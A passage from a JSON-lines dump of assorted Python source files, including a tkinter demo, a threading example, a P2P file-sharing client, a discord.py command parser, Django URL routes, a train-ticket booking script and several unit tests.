key=lambda item: -item[1])\n logger.debug('Matcher - %d matches for %s (n=%d, threshold=%.2f)' % (len(sims), text, n, threshold))\n return sims[:n]\n\nclass PromiseMatcher(DocumentMatcher):\n def __init__(self):\n self.document_transform = lambda p: (pos_tagger_for_model(p['title']), [p['pk']], )\n \n def get_queryset(self):\n return Promise.objects.filter(person__mayor_for_province=\"서울특별시\").values('pk', 'title')\n #return Promise.objects.filter(person__mayor_for_province=\"서울특별시\").values('pk', 'title')\n\n# Global instance of promise matcher\npromise_matcher = PromiseMatcher()\n","sub_path":"web/promises/matcher.py","file_name":"matcher.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"184992596","text":"import tkinter\n\nmain = tkinter.Tk()\n\ndef move_left():\n lb.place(relx = 0, rely = 0, anchor=\"nw\")\n\ndef move_right():\n lb.place(relx = 1, rely = 0, anchor=\"ne\")\n\ndef close():\n main.destroy()\n\nlb = tkinter.Label(main, text = \"Label\")\nlb.place(relx=0.5, rely=0)\n\nmove_left_button = tkinter.Button(main, text = \"Move left\", command = move_left)\nmove_left_button.place(relx = 0, rely = 1, anchor=\"sw\")\n\nclose_button = tkinter.Button(main, text = \"Close\", command = close)\nclose_button.place(relx = 0.5, rely = 1, anchor=\"s\")\n\nmove_right_button = tkinter.Button(main, text = \"Move right\", command = move_right)\nmove_right_button.place(relx = 1, rely = 1, anchor=\"se\")\n\nmain.mainloop()\n","sub_path":"Tk_Toolkit/OldBook/place_3.py","file_name":"place_3.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"634542635","text":"import threading\n\nimport time \nimport random\n\nqueue = []\n\nMAX_ITEMS = 10\n\n# A factory function that returns a new condition variable object. \n# A condition variable allows one or more threads to wait until\n# they are notified by another thread. \ncondition = threading.Condition()\n\n# class should be inherited from the threading.Thread \nclass ProducerThread(threading.Thread):\n # when inheriting from the \n # thread make sure to override the run function. \n def run(self):\n numbers = range(5)\n # globalizing the variable. \n global queue\n\n while True:\n # the below method tries to hold the lock on the thread. \n condition.acquire()\n if len(queue) == MAX_ITEMS:\n print(\"Queue is full, producer is waiting\")\n # the below methods waits for the buffer to be available. \n condition.wait()\n print(\"Space in queue, Consumer notified producer\")\n number = random.choice(numbers)\n queue.append(number)\n print(\"Produced {}\".format(number))\n # sends a signal to intiamate any threads that is in waiting state. \n condition.notify()\n # releases the lock held by the acuqire method. \n condition.release()\n time.sleep(random.random())\n\nclass ConsumerThread(threading.Thread):\n def run(self):\n global queue\n\n while True:\n condition.acquire()\n if not queue:\n print(\"Nothing in queue, consumer is waiting\")\n condition.wait()\n print(\"Producer added something to queue and notify the Consumer\")\n number = queue.pop(0)\n print(\"Consumder {}\".format(number))\n condition.notify()\n condition.release()\n time.sleep(random.random())\n\nproducer = ProducerThread()\n# non daemon threads will execute for ever and will not terminate \n# Hence daemonizing the threads. \nproducer.daemon = True\nproducer.start()\n\nconsumer = ConsumerThread()\n# non daemon threads will execute for ever and will not terminate \n# Hence daemonizing the threads. \nconsumer.daemon = True\nconsumer.start()\n\n# Keeping the main thread alive so that when we interrupt the main thread\n# the daemon thread also gets killed. \nwhile True:\n time.sleep(1)","sub_path":"Multithreading_Module/5_conditional_statements-consumer-producer-problem.py","file_name":"5_conditional_statements-consumer-producer-problem.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"333683669","text":"\nimport pytest\nimport numpy as np\nimport chem_eq\n\ndef test_eq_concs():\n Kd = 10\n ca_0 = 5\n cb_0 = 11\n ca, cb, cab = chem_eq.eq_concs(Kd, ca_0, cb_0)\n\n assert np.close(Kd, (ca * cb) / cab)\n\n assert ca >= 0 and cb >= 0 and cab >= 0\n","sub_path":"created/4/tests/test_chem_eq.py","file_name":"test_chem_eq.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"58684898","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Dimitrios Paraschas\n# 1562\n# Dimitrios Greasidis\n# 1624\n# Stefanos Papanastasiou\n# 1608\n\n\nfrom __future__ import print_function\nimport logging\nimport os\nimport signal\nimport socket\nimport sys\nimport Queue\nfrom threading import Thread\n\nfrom library.library import json_load\nfrom library.library import json_save\nfrom library.library import send_message\n\n\n#DEBUG = True\nDEBUG = False\n\n\nconfiguration_file = \"\"\nconfiguration = {}\nshare_directory = \"\"\nfull_list_of_files = []\nrequested_file = \"\"\n\n\n# handle keyboard interrupts (CTRL-C)\ndef sigint_handler(signal, frame):\n # cli_output\n print()\n logging.info(\"CTRL-C received, exiting\")\n sys.exit(0)\n\n\nsignal.signal(signal.SIGINT, sigint_handler)\n\n\n# main recursive function used for communication of the client with the server\ndef converse(server, incoming_buffer, own_previous_command):\n global configuration\n global full_list_of_files\n global requested_file\n\n # parse message\n if \"\\0\" not in incoming_buffer:\n incoming_buffer += server.recv(4096)\n return converse(server, incoming_buffer, own_previous_command)\n else:\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n lines = message.split(\"\\n\")\n fields = lines[0].split()\n command = fields[0]\n\n # protocol messages and answers\n if command == \"AVAILABLE\":\n username = fields[1]\n username = get_name(username)\n\n send_message(server, \"IWANT \" + username + \"\\n\\0\")\n\n return converse(server, incoming_buffer, \"IWANT\")\n\n elif command == \"WELCOME\":\n username = fields[1]\n configuration[\"username\"] = username\n json_save(configuration_file, configuration)\n\n return None, incoming_buffer\n\n elif command == \"FULLLIST\" and own_previous_command == \"SENDLIST\":\n number_of_files = int(fields[1])\n\n if number_of_files != (len(lines) - 1):\n logging.warning(\"invalid FULLLIST message, wrong number of files\")\n send_message(server, \"ERROR\\n\\0\")\n sys.exit(-1)\n else:\n full_list_of_files = lines[1:]\n\n # cli_output\n print()\n print(\"full list of clients' files\")\n for line in lines[1:]:\n print(line)\n\n return None, incoming_buffer\n\n elif command == \"AT\" and own_previous_command ==\"WHERE\":\n peer_ip = fields[1]\n peer_port = int(fields[2])\n\n return (peer_ip, peer_port), incoming_buffer\n\n elif command == \"OK\" and own_previous_command in (\"LIST\", \"LISTENING\"):\n return None, incoming_buffer\n\n elif command == \"ERROR\":\n logging.warning(\"ERROR message received, exiting\")\n sys.exit(-1)\n\n else:\n # TODO\n # handle invalid commands\n logging.warning('an invalid command was received: \"{}\"'.format(command))\n sys.exit(-1)\n\n\n# create a socket and establish a connection\ndef connection_init(address):\n ip, port = address\n\n try:\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n logging.error(\"socket.socket error\")\n sys.exit(-1)\n\n try:\n connection.connect( (ip, port) )\n # cli_output\n logging.info(\"connected to server or peer {}:{}\".format(ip, port))\n except socket.error:\n # cli_output\n logging.debug(\"failed to connect to port {}, exiting\".format(port))\n sys.exit(-1)\n\n return connection\n\n\n# get a username from the user\ndef get_name(username_):\n # cli_output\n print('Specify a username (press enter for the default \"{}\"): '.format(username_))\n username = raw_input()\n\n if username == \"\":\n username = username_\n\n return username\n\n\n# connect to a peer\ndef peer_function(connection, address):\n \"\"\"\n connection : connection socket\n address : (IP_address, port)\n \"\"\"\n global share_directory\n\n incoming_buffer = \"\"\n\n while True:\n # parse message\n while \"\\0\" not in incoming_buffer:\n incoming_buffer += connection.recv(4096)\n\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n fields = message.split()\n command = fields[0]\n # handle and respond to the message\n if command == \"GIVE\":\n file_ = share_directory + \"/\" + fields[1]\n\n if os.path.isfile(file_):\n # get the file size\n file_size = os.path.getsize(file_)\n\n send_message(connection, \"TAKE {}\\n\\0\".format(str(file_size)))\n\n file__ = open(file_, \"rb\")\n\n file_buffer = \"\"\n file_buffer = file__.read(1024)\n while file_buffer:\n print(\"sending: \" + file_buffer)\n connection.send(file_buffer)\n file_buffer = file__.read(1024)\n\n # cli_output\n logging.info(\"file {} sent\".format(file_))\n\n file__.close()\n else:\n send_message(connection, \"ERROR\\n\\0\")\n connection.close()\n break\n\n elif command == \"THANKS\":\n connection.close()\n break\n\n else:\n send_message(connection, \"ERROR\\n\\0\")\n connection.close()\n break\n\n return\n\n\n# create a server socket and start listening for incoming connections\ndef listen(listening_ip, listening_port, queue):\n try:\n listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error:\n logging.error(\"socket.socket error\")\n sys.exit(-1)\n\n try:\n listening_socket.bind( (listening_ip, listening_port) )\n except socket.error:\n logging.error(\"port {} in use, exiting\".format(listening_port))\n sys.exit(-1)\n\n # listen for incoming connections\n listening_socket.listen(5)\n\n # cli_output\n logging.info(\"client listening on {}:{}\".format(listening_ip, str(listening_port)))\n\n listening_port = listening_socket.getsockname()[1]\n\n # pass the listening_ip and listening_port to the main thread\n queue.put( (listening_ip, listening_port) )\n\n # handle incoming peer connections\n peer_counter = 0\n while True:\n connection, address = listening_socket.accept()\n # cli_output\n logging.info(\"a peer connected from {}:{}\".format(address[0], str(address[1])))\n\n peer_thread = Thread(name=\"peer {}\".format(peer_counter),\n target=peer_function, args=(connection, address))\n # TODO\n # handle differently, terminate gracefully\n peer_thread.daemon = True\n peer_thread.start()\n\n peer_counter += 1\n\n\n# handle file requests and transfers\ndef give_me(peer):\n global requested_file\n\n # cli_output\n print()\n print(\"file name:\")\n requested_file = raw_input()\n\n send_message(peer, \"GIVE {}\\n\\0\".format(requested_file))\n\n incoming_buffer = \"\"\n\n # parse message\n while \"\\0\" not in incoming_buffer:\n incoming_buffer += peer.recv(4096)\n\n index = incoming_buffer.index(\"\\0\")\n message = incoming_buffer[0:index-1]\n incoming_buffer = incoming_buffer[index+1:]\n\n logging.info(\"message received: \" + message)\n\n fields = message.split()\n command = fields[0]\n\n if command == \"TAKE\":\n file_size = fields[1]\n\n # get the file\n while len(incoming_buffer) < int(file_size):\n incoming_buffer += peer.recv(4096)\n logging.debug(\"received: \" + incoming_buffer)\n # TODO\n # save the file chunk by chunk\n\n file_to_save = open(share_directory + \"/\" + requested_file, \"wb\")\n file_to_save.write(incoming_buffer)\n file_to_save.close()\n\n logging.info(\"file {} received\".format(requested_file))\n logging.info(\"reconnect to the server to refresh the shared files list\")\n send_message(peer, \"THANKS\\n\\0\")\n peer.close()\n\n elif command == \"ERROR\":\n return\n\n else:\n # TODO\n # handle invalid commands\n logging.warning('an invalid command was received: \"{}\"'.format(command))\n sys.exit(-1)\n\n\ndef main():\n global configuration\n global configuration_file\n global full_list_of_files\n global share_directory\n\n # logging configuration\n logging.basicConfig(level=logging.DEBUG,\n format=\"[%(levelname)s] (%(threadName)s) %(message)s\",\n filename=\"client.log\",\n filemode=\"w\")\n console = logging.StreamHandler()\n if DEBUG:\n # set the console logging level to debug\n console.setLevel(logging.DEBUG)\n else:\n # set the console logging level to info\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(\"[%(levelname)s] (%(threadName)s) %(message)s\")\n console.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(console)\n\n configuration_file = \"configuration.json\"\n\n if os.path.isfile(configuration_file):\n # load the configuration from the json file\n configuration = json_load(configuration_file)\n else:\n # create and initialize the configuration file\n configuration[\"server_host\"] = \"localhost\"\n configuration[\"server_port\"] = 45000\n configuration[\"listening_ip\"] = \"localhost\"\n configuration[\"listening_port\"] = 0\n configuration[\"share_directory\"] = \"share\"\n json_save(configuration_file, configuration)\n\n logging.debug(\"configuration: \" + str(configuration))\n\n share_directory = configuration[\"share_directory\"]\n files_list = [ file_ for file_ in os.listdir(share_directory) if os.path.isfile(os.path.join(share_directory, file_)) ]\n\n logging.debug(\"files_list: \" + str(files_list))\n\n server_address = (configuration[\"server_host\"], configuration[\"server_port\"])\n server = connection_init(server_address)\n\n\n # start with an empty incoming message buffer\n incoming_buffer = \"\"\n\n\n # send HELLO command\n ############################################################################\n if \"username\" in configuration:\n send_message(server, \"HELLO \" + configuration[\"username\"] + \"\\n\\0\")\n else:\n send_message(server, \"HELLO\\n\\0\")\n\n unneeded, incoming_buffer = converse(server, incoming_buffer, \"HELLO\")\n\n\n # send LISTENING command\n ############################################################################\n listening_ip = configuration[\"listening_ip\"]\n listening_port = configuration[\"listening_port\"]\n\n queue = Queue.Queue()\n\n # spawn listening thread\n listening_thread = Thread(name=\"ListeningThread\", target=listen,\n args=(listening_ip, listening_port, queue))\n # TODO\n # handle differently, terminate gracefully\n listening_thread.daemon = True\n listening_thread.start()\n\n listening_ip, listening_port = queue.get()\n\n listening_message = \"LISTENING {} {}\\n\\0\".format(listening_ip, listening_port)\n send_message(server, listening_message)\n\n converse(server, incoming_buffer, \"LISTENING\")\n\n\n # send LIST command\n ############################################################################\n list_message = \"LIST {}\\n\".format(len(files_list))\n for file_ in files_list:\n list_message += file_ + \"\\n\"\n list_message += \"\\0\"\n send_message(server, list_message)\n\n converse(server, incoming_buffer, \"LIST\")\n\n\n # send SENDLIST command\n ############################################################################\n send_message(server, \"SENDLIST \" + \"\\n\\0\")\n\n converse(server, incoming_buffer, \"SENDLIST\")\n\n\n # options menu/loop\n ############################################################################\n while True:\n print()\n print(\"options:\")\n print(\"1: SENDLIST / s : request the list of clients and shared files\")\n print(\"2: WHERE / w : request the IP address and port of the specified client\")\n print(\"5: QUIT / q : exit the program\")\n\n option = raw_input()\n if option in [\"1\", \"s\", \"S\", \"sendlist\", \"SENDLIST\"]:\n send_message(server, \"SENDLIST \" + \"\\n\\0\")\n\n converse(server, incoming_buffer, \"SENDLIST\")\n\n elif option in [\"2\", \"w\", \"W\", \"where\", \"WHERE\"]:\n print(\"Enter the username of the client:\")\n\n while True:\n client = raw_input()\n\n if client == configuration[\"username\"]:\n print(\"{} is you, try again: \".format(client))\n continue\n\n if client in [pair.split()[0] for pair in full_list_of_files]:\n break\n\n print(\"{} is an invalid client username, try again: \".format(client))\n\n send_message(server, \"WHERE \" + client + \"\\n\\0\")\n\n (peer_ip, peer_port), incoming_buffer = converse(server, incoming_buffer, \"WHERE\")\n\n peer = connection_init( (peer_ip, peer_port) )\n\n give_me(peer)\n\n elif option in [\"5\", \"q\", \"Q\", \"quit\", \"QUIT\"]:\n sys.exit(0)\n\n else:\n print(\"invalid option, try again\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"24946604","text":"# Copyright (c) 2018 James Patrick Dill\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport inspect\nimport re\n\nimport discord\n\nfrom detache import errors\n\n\nclass Context(object):\n \"\"\"\n Command context, passed to command functions for easier handling\n\n :attr discord.Message message: Message\n :attr discord.Guild guild: Guild the message was sent in\n :attr discord.Channel channel: Channel the message was sent in\n :attr discord.Member: author: Author of the message\n \"\"\"\n\n def __init__(self, plugin, message, prefix=\"\"):\n self.plugin = plugin\n\n self.message = message\n\n self.guild = message.guild\n self.channel = message.channel\n self.author = message.author\n\n self.prefix = prefix\n\n async def send(self, *args, **kwargs):\n \"\"\"\n Coroutine\n\n Sends a message in the context's channel. Pass the same arguments or keywords that you would to\n :meth:`discord.Channel.send`\n \"\"\"\n\n await self.channel.send(*args, **kwargs)\n\n\n# empty class returned when an type doesn't match\nclass NoMatch:\n pass\n\n\n# argument types\n\nclass Any:\n pattern = \"[^ ]+\"\n\n @classmethod\n def convert(cls, ctx, raw):\n \"\"\"\n Converts string argument to specified type.\n\n :param ctx: Context.\n :param str raw: Raw passed argument.\n \"\"\"\n\n return raw\n\n @classmethod\n def consume(cls, ctx, args):\n \"\"\"\n Parses an argument from an argument string, and returns the argument string with this argument consumed.\n\n :return: parsed, argString\n \"\"\"\n\n match = re.match(cls.pattern, args, flags=re.IGNORECASE)\n\n if match:\n match = match[0]\n\n parsed = cls.convert(ctx, match)\n\n span = len(match)\n if span >= len(args):\n return parsed, \"\"\n\n return parsed, args[span + 1:] # remove this argument from arguments string\n\n else:\n return NoMatch, args\n\n\nclass String(Any):\n pattern = r'(\"[^\\n]+\"|[^ \\n]+)'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if the string is multi-word, it is surrounded in quotes. remove them\n if raw[0] == raw[-1] == '\"':\n return raw[1:-1]\n\n return raw\n\n\nclass Number(Any):\n pattern = \"\\d+(\\.\\d+)?\"\n\n @classmethod\n def convert(cls, ctx, raw):\n try:\n if \".\" in raw:\n return float(raw)\n else:\n return int(raw)\n\n except ValueError:\n raise errors.WrongType(\"{!r} is not a number.\".format(raw))\n\n\nclass User(Any):\n pattern = \"(<@!?([0-9]+)>|.{2,32}#[0-9]{4})\"\n\n @classmethod\n def convert(cls, ctx, raw):\n # if contains \"#\", user tag was passed. otherwise, mention\n if \"#\" in raw:\n member = ctx.guild.get_member_named(raw)\n else:\n user_id = int(re.search(\"[0-9]+\", raw)[0])\n member = ctx.guild.get_member(user_id)\n\n if member is None:\n raise errors.ParsingError(\"{} isn't a member of {}.\".format(raw, ctx.guild))\n\n return member\n\n\nclass Channel(Any):\n pattern = r'(<#([0-9]+)>|#.{1,255})'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if starts with \"#\", name of channel was passed.\n if raw.startswith(\"#\"):\n name = raw[1:]\n\n channel = discord.utils.get(ctx.guild.text_channels, name=name)\n else:\n channel_id = int(re.search(\"[0-9]+\", raw)[0])\n\n channel = discord.utils.get(ctx.guild.text_channels, id=channel_id)\n\n if channel is None:\n raise errors.ParsingError(\"{} isn't a channel in {}.\".format(raw, ctx.guild))\n\n return channel\n\n\nclass Role(Any):\n pattern = r'(<@&[0-9]+>|\"[^\\n]+\"|[^ \\n]+)'\n\n @classmethod\n def convert(cls, ctx, raw):\n # if starts with \"<@&\", role mention was passed.\n if raw.startswith(\"<@&\") and raw.endswith(\">\"):\n role_id = int(re.search(\"[0-9]+\", raw)[0])\n\n role = discord.utils.get(ctx.guild.roles, id=role_id)\n else:\n name = raw\n\n if name[0] == name[-1] == '\"': # multi word, remove quotes\n name = name[1:-1]\n\n role = discord.utils.get(ctx.guild.roles, name=name)\n\n if role is None:\n raise errors.ParsingError(\"{} isn't a role in {}.\".format(raw, ctx.guild))\n\n return role\n\n\n# argument decorator\n\ndef argument(name, type=None, default=None, required=True, nargs=1, help=None):\n \"\"\"\n Command argument.\n\n :param name: Name of the argument. Should match one of the function's arguments.\n :param type: (Optional) Argument type. Leave as None to accept any type.\n :param default: (Optional) Default value.\n :param required: (Optional) Whether the argument is required. Defaults to True\n :param nargs: (Optional) Number of times the argument can occur. Defaults to 1. -1 allows unlimited arguments.\n :param help: (Optional) Argument description.\n\n If nargs is anything other than 1, the parsed argument will be returned as a list.\n \"\"\"\n\n if nargs not in (1, -1) and not required:\n raise ValueError(\"nargs must = 1 or -1 for arguments that aren't required\")\n\n type = type or Any # default ArgumentType class accepts anything as valid argument\n\n class Argument:\n @classmethod\n def no_match_error(cls):\n if nargs == 1:\n raise errors.ParsingError(\n \"**{}** is a required {}.\".format(name, type.__name__.lower())\n )\n else:\n raise errors.ParsingError(\n \"**{}** are required.\".format(name + (\"\" if name.endswith(\"s\") else \"s\")) # use plural\n )\n\n @classmethod\n def consume(cls, ctx, args):\n \"\"\"\n Parses an argument from an argument string, and returns the argument string with this argument consumed.\n\n :return: parsed, argString\n \"\"\"\n\n parsed, args = type.consume(ctx, args) # use argument type's parsing function\n\n if parsed is NoMatch: # argument is wrong type or not found\n if required or nargs != 1:\n cls.no_match_error()\n else:\n parsed = default\n\n return parsed, args\n\n Argument.name = name\n Argument.help = help\n Argument.type_ = type\n Argument.nargs = nargs\n Argument.required = required\n\n # actual decorator\n def add_argument(func):\n if hasattr(func, \"cmd_args\"):\n func.cmd_args.append(Argument) # add to command function's arg list\n else:\n func.cmd_args = [Argument] # arg list doesnt exist, create it\n\n return func\n\n return add_argument\n\n\n# used to check plugin for commands\nclass CommandInherit:\n pass\n\n\ndef command(name, description=None, required_permissions=None):\n \"\"\"\n Command decorator. Put this before a command and its arguments.\n\n :param str name: Name of command\n :param str description: Description of commands\n :param list[str] required_permissions: (Optional) Permissions required to use command\n \"\"\"\n\n class Command(CommandInherit):\n def __init__(self, func):\n self.name = name\n self.description = description or inspect.cleandoc(inspect.getdoc(func))\n\n self.args = list(reversed(getattr(func, \"cmd_args\", []))) # fix order of arguments\n\n self.func = func\n\n self.__doc__ = self.make_doc()\n\n def __repr__(self):\n return \"Command({!r})\".format(self.name)\n\n def make_doc(self, prefix=\"\"):\n doc = \"{}**{}** \".format(prefix, self.name) + \" \".join([arg.name for arg in self.args]) + \"\\n\\n\" # syntax\n\n # list arg types, names, descriptions\n for arg in self.args:\n arg_name = arg.type_.__name__ + (\"(s)\" if arg.nargs != 1 else \"\")\n\n doc += \"• {} **{}**\".format(arg_name, arg.name)\n\n if arg.help is not None:\n doc += \" - {}\".format(arg.help)\n\n doc += \"\\n\"\n\n doc += \"\\n\" + self.description\n\n return doc\n\n async def process(self, ctx, content):\n # process given arguments and run the command\n\n # check for required permissions before parsing\n if required_permissions is not None:\n author_perms = ctx.author.permissions_in(ctx.channel)\n\n for perm in required_permissions:\n # check permission. if not specified in permissions, assume False\n if not getattr(author_perms, perm, False):\n raise errors.MissingPermissions(\"This command requires the `{}` permission.\".format(perm))\n\n parsed_args = {}\n\n try:\n for arg in self.args:\n # parse argument and update with what's left of argument string\n\n if arg.nargs == 1: # only 1 arg\n parsed, content = arg.consume(ctx, content)\n\n parsed_args[arg.name] = parsed\n\n elif arg.nargs == -1: # any number of args\n parsed = []\n\n while True:\n try:\n value, content = arg.consume(ctx, content)\n\n parsed.append(value)\n except errors.ParsingError as e: # no more args\n if len(parsed) == 0 and arg.required:\n # must pass at least one arg if it's required\n raise e\n\n break\n\n parsed_args[arg.name] = parsed\n else:\n parsed = []\n\n for i in range(arg.nargs): # limit to nargs\n try:\n value, content = arg.consume(ctx, content)\n\n parsed.append(value)\n except errors.ParsingError: # no more args\n break\n\n parsed_args[arg.name] = parsed\n\n except errors.ParsingError as e:\n raise errors.ParsingError(\"{}\\n\\n{}\".format(e, self.make_doc(ctx.prefix)))\n\n reply = await self.func(ctx.plugin, ctx, **parsed_args)\n\n if reply:\n await ctx.send(reply)\n\n return Command\n","sub_path":"detache/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"632402921","text":"from logger import log\nfrom time import sleep\n\nmsg = ''\n\n\n# add @log to the principle method call.\n\n@log\ndef mock_write(m):\n global msg\n sleep(0.0001) # simulated write time\n msg = m\n\n\n@log\ndef mock_read():\n global msg\n sleep(0.0001) # simulated read time\n print(msg)\n\n\n# call WRITE/READ functions\nfor i in range(1000):\n mock_write(f'demo string {i}')\n mock_read()\n","sub_path":"Datastores & Distributed File Systems/common/logusage.py","file_name":"logusage.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"520956808","text":"# ------------------------------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------------------------------\n\nfrom dapr.clients import DaprClient\n\nwith DaprClient() as d:\n key = 'secretKey'\n storeName = 'localsecretstore'\n\n resp = d.get_secret(store_name=storeName, key=key)\n print('Got!')\n print(resp._secret)\n","sub_path":"examples/secret_store/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"350994006","text":"from django.urls import path\nfrom django.contrib.auth.views import LogoutView\n\nfrom .views import (\n Index, ProductDetail,\n GlobalCategoryDetail,\n CategoryDetail,\n RegistrationView,\n AddToCart,\n CartView,\n DeleteCartProduct,\n ChangeCartProductAmount,\n UserProfile,\n OrderView,\n LoginView,\n CartOrderedView,\n CreateNewView,\n )\n\n\nurlpatterns = [\n path('', Index.as_view(), name='index'),\n path('detail//', ProductDetail.as_view(), name='product_detail'),\n path('global//', GlobalCategoryDetail.as_view(), name='global_category_detail'),\n path('not-global//', CategoryDetail.as_view(), name='category_detail'),\n path('registration/', RegistrationView.as_view(), name='registration'),\n path('login/', LoginView.as_view(), name='login'),\n path('logout/', LogoutView.as_view(), name='logout'),\n path('add-to-cart//', AddToCart.as_view(), name='add_to_cart'),\n path('cart-detail/', CartView.as_view(), name='cart_detail'),\n path('del-cart-product//', DeleteCartProduct.as_view(), name='del_cart_product'),\n path('change-amount//', ChangeCartProductAmount.as_view(), name='change_amount'),\n path('user-profile/', UserProfile.as_view(), name='user_profile'),\n path('create-order/', OrderView.as_view(), name='create_order'),\n path('order-detail//', CartOrderedView.as_view(), name='order_view'),\n path('create-new/', CreateNewView.as_view(), name='create_new'),\n]\n","sub_path":"mainapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"618482503","text":"import time\n\nfrom global_data.session import LOGIN_SESSION\nfrom logic.login.login import NormalLogin\nfrom logic.query.query import Query\nfrom config import Config\nfrom logic.submit.fastsubmit import FastSubmitDcOrder\nfrom logic.submit.submit import NormalSubmitDcOrder\nfrom utils.send_email import send_email\nfrom utils.log import Log\nfrom utils.data_loader import LocalSimpleCache\n\n\nclass Schedule(object):\n retry_login_time = Config.basic_config.retry_login_time\n login_status = False\n order_id = ''\n\n def run(self):\n s = LocalSimpleCache('', 'logincookie.pickle').get_final_data()\n if not s.raw_data:\n count = 0\n while self.retry_login_time:\n l = NormalLogin()\n Log.v(\"正在为您登录\")\n status, msg = l.login()\n if not status:\n count += 1\n Log.v(\"登录失败, 重试{0}次\".format(count))\n self.retry_login_time -= 1\n continue\n else:\n Log.v(\"登录成功\")\n Log.v(\"导出已经登录的cookie,已便下次使用\")\n Log.v(\"cookie的有效期为 {0}小时\".format(s.expire_time))\n s.raw_data = LOGIN_SESSION.cookies\n s.export_pickle()\n break\n if not self.retry_login_time:\n Log.v(\"重试次数已经超过设置\")\n return\n else:\n Log.v(\"加载已经登录的cookie\")\n LOGIN_SESSION.cookies.update(s.raw_data)\n Log.v(\"正在查询车次余票信息\")\n count = 0\n while True:\n count += 1\n q = Query()\n data = q.filter()\n if not data:\n Log.v(\"满足条件的车次暂无余票,正在重新查询\")\n for v in data:\n print(v[0])\n q.pretty_output(v[1])\n time.sleep(5)\n Log.v(\"查询{0}次\".format(count))\n for v in data:\n if Config.basic_config.fast_submit:\n submit = FastSubmitDcOrder(v[1], v[0])\n else:\n submit = NormalSubmitDcOrder(v[1], v[0])\n f = submit.run()\n if not f:\n continue\n else:\n self.order_id = submit.order_id\n break\n if self.order_id:\n break\n\n Log.v(\"抢票成功,如果有配置邮箱,稍后会收到邮件通知\")\n # 抢票成功发邮件信息\n send_email(2, **{\"order_no\": self.order_id})\n\n\nif __name__ == \"__main__\":\n instance = Schedule()\n instance.run()\n","sub_path":"python12306/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192949196","text":"import unittest\nimport numpy as np\nimport pandas as pd\nimport os\nfrom numpy.testing import assert_array_equal\nfrom cacb.cacb import ContinuousActionContextualBanditModel\n\n\nnp.random.seed(123)\n\n\nmock_log_data = pd.DataFrame(\n [\n [0.90, 115, -3, 0, 0, 0],\n [0.90, 100, 0, 0, 0, 1],\n [0.90, 105, -1, 0, 1, 0],\n [0.90, 110, 2, 0, 1, 1],\n [0.0333, 120, 4, 1, 1, 0],\n ]\n)\n\nmock_file = \"./tests/mock.csv\"\n\n\nclass ContinuousActionContextualBanditModelTest(unittest.TestCase):\n def setUp(self):\n mock_log_data.to_csv(mock_file, header=None, index=None) # type: ignore\n\n def test_get_actions(self):\n actions1 = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=1,\n )._get_actions()\n self.assertListEqual(actions1, [10, 11, 12, 13, 14, 15])\n\n actions2 = ContinuousActionContextualBanditModel(\n min_value=-10,\n max_value=-5,\n action_width=1,\n )._get_actions()\n self.assertListEqual(actions2, [-10, -9, -8, -7, -6, -5])\n\n actions3 = ContinuousActionContextualBanditModel(\n min_value=10,\n max_value=15,\n action_width=2,\n 